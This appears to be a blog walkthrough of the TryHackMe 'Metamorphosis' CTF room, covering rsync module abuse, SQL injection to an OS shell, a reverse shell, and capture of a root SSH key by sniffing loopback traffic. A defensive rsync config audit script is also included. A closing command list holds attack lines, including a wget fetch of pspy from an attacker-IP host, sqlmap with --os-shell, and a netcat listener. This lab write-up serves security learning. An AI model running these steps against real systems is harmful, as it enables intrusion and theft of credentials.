Introduction

In this walkthrough we cover enumerating an exposed rsync service and sniffing loopback traffic with tcpdump to extract the information needed to complete the Metamorphosis room (part of the Incognito CTF series on TryHackMe).


Initial Reconnaissance

My first step was to run an Nmap scan to see what services were running on the machine. The scan revealed several open ports, including SSH (22), HTTP (80), SMB (139 and 445), and most interestingly, rsync (873). The rsync service immediately caught my eye as a potential entry point.

Next, I turned my attention to the web server on port 80. It was just a default Apache page, so I fired up Gobuster to look for hidden directories. Gobuster found /index.php and /admin, but trying to access /admin gave me a “403 Forbidden” error. Looking at the page’s source code, I found a clue: the admin functionality was only available in a “development environment.” This told me I needed to find and modify a configuration file, likely a web.ini file, to switch the environment from “production” to “development.”

Exploiting Rsync

With the web server at a temporary dead end, I went back to the rsync service. I used an Nmap script to list the available rsync modules and found one named “conf.” I then used the rsync command to list the contents of this “conf” module, which revealed several configuration files, including mysql.ini and, just as I suspected, web.ini.

I downloaded these files to my machine and, upon inspecting web.ini, I found a set of hardcoded credentials: username “tom” and password “cat.” I also saw the environment variable was set to “production.” I changed this to “development” and then used rsync to upload the modified web.ini file back to the target machine.
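The exposure above comes down to the rsync daemon's module settings: a module that is listable, anonymously readable and, in this case, writable. The following audit script is an added example (not part of the original post or of the room) that parses an rsyncd.conf and flags those conditions; the two configuration fragments are constructed to mirror the "conf" module, since the target's real rsyncd.conf is not shown on the page.

```python
"""Audit rsyncd.conf modules for anonymous, listable or writable exposure."""
import configparser
from typing import Dict, List

# Constructed weak config (assumption): mirrors a module like "conf" that anyone can
# list, read and write to, which is what let web.ini be pulled and pushed back.
WEAK_CONF = """
uid = nobody
gid = nogroup

[conf]
path = /srv/rsync/conf
comment = web and mysql configuration
read only = no
"""

# Constructed hardened config: read-only, hidden from module listing,
# authenticated, and restricted to a single client address.
HARDENED_CONF = """
uid = nobody
gid = nogroup

[conf]
path = /srv/rsync/conf
read only = yes
list = no
auth users = deploy
secrets file = /etc/rsyncd.secrets
hosts allow = 10.0.0.5
"""


def parse_rsyncd(text: str) -> configparser.ConfigParser:
    """rsyncd.conf is INI-like; global options precede the first [module]."""
    cp = configparser.ConfigParser(default_section="global", interpolation=None)
    cp.read_string("[global]\n" + text)  # global keys become defaults for every module
    return cp


def audit(text: str) -> Dict[str, List[str]]:
    """Return, per module, the exposure issues found (empty list means clean)."""
    findings: Dict[str, List[str]] = {}
    for name in parse_rsyncd(text).sections():
        sec = parse_rsyncd(text)[name]
        issues: List[str] = []
        if not sec.get("auth users", "").strip():
            issues.append("anonymous access (no 'auth users')")
        if not sec.get("hosts allow", "").strip():
            issues.append("no 'hosts allow' restriction")
        if sec.getboolean("read only", fallback=True) is False:  # rsync default: yes
            issues.append("writable module ('read only = no')")
        if sec.getboolean("list", fallback=True):  # rsync default: listable
            issues.append("module listable ('list = yes')")
        findings[name] = issues
    return findings
```

Run `audit(WEAK_CONF)` to see all four issues reported for the "conf" module, and `audit(HARDENED_CONF)` to confirm the corrected module comes back clean.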

SQL Injection and a Reverse Shell

With the environment now set to “development,” I was able to access the /admin page. The page had an input field to get user information. I fired up Burp Suite to intercept the request and then used SQLMap to test for SQL injection vulnerabilities on the username parameter. SQLMap quickly found a vulnerability and even gave me an OS shell!

From there, I tried a few different reverse shell one-liners and successfully got a connection back to my machine using a PHP reverse shell. I now had a shell as the www-data user.

Privilege Escalation

To escalate my privileges, I downloaded and ran pspy, a tool that monitors running processes. Pspy revealed a recurring curl process running as root. This process was accessing a local port (1027) and passing a parameter. This looked like a promising vector for privilege escalation.

Since the curl process was accessing a local port, I used tcpdump on the target machine to sniff the traffic on the loopback interface and saved it to a pcap file. I then transferred this file back to my machine and opened it in Wireshark. Analyzing the captured traffic, I found an SSH private key within the HTTP response of the curl request.

Getting Root

I saved the SSH private key to a file, gave it the correct permissions, and then used it to SSH into the machine as the root user. Success! I had full root access. From there, it was a simple matter of finding the root flag in /root/root.txt and the user flag in /home/user/user.txt.

Technical Commands

Here are some of the key commands I used during this engagement:

  • Gobuster for directory enumeration:
    • sudo gobuster dir -u [IP_ADDRESS] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
  • Nmap Scripting Engine for rsync enumeration:
    • ls -la /usr/share/nmap/scripts | grep rsync
    • sudo nmap --script rsync-list-modules -p 873 [IP_ADDRESS]
  • Rsync for listing and downloading files:
    • rsync rsync://[IP_ADDRESS]/conf
    • mkdir rsync
    • rsync -av rsync://[IP_ADDRESS]/conf ./rsync
  • Rsync for uploading files:
    • rsync -av web.ini rsync://[IP_ADDRESS]/conf/web.ini
  • SQLMap for SQL injection:
    • sqlmap -r request --dbs --level 5 --risk 3 --os-shell
  • Netcat listener:
    • nc -lvp 4545
  • Python HTTP server:
    • python3 -m http.server
  • Wget for downloading files:
    • wget http://[ATTACKER_IP]:8000/pspy64s
  • Changing file permissions:
    • chmod +x pspy64s
  • Running pspy:
    • ./pspy64s
  • Tcpdump for sniffing traffic:
    • sudo tcpdump -i lo -w curl.pcap
  • Moving files:
    • mv curl.pcap /var/www/html
  • SSH with private key:
    • chmod 600 id_rsa
    • ssh -i id_rsa root@[IP_ADDRESS]
  • Listing and reading flags:
    • ls
    • cat root.txt
    • cat user.txt

Metamorphosis TryHackMe Room Answers

user.txt

root.txt

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.